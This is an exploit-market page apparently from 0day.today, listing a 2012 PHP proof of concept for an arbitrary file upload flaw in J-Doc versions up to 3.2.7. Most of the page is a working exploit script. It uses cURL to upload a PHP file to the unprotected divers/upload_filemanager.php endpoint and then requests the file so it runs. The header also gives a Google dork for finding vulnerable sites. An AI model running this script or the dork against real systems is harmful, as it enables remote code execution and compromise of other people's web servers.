[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

J-Doc <= v3.2.7 Arbitrary file upload

Author
leviathan
Risk
[
Security Risk High
]
0day-ID
0day-ID-19162
Category
web applications
Date add
10-08-2012
Platform
php
<?php
# Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload
# Date: 2012-08-10
# Author: leviathan
# Vendor or Software Link: http://www.j-doc.com/
# Version: <= 3.2.7
# Category:: webapps
# Google dork: intext:"Système de partage de documents par Projet"
# Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2
# Demo site: 


// The vulnerable website
$base_url = 'http://localhost/jdoc/';
$file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'info.php';
$file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME);
$folder = '.'; // related to the divers folder

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder);
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@'.$file_to_upload,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);

if (curl_exec($curl)) {
  echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call);
} else {
  die('error in the exploit');
}



#  0day.today [2024-12-24]  #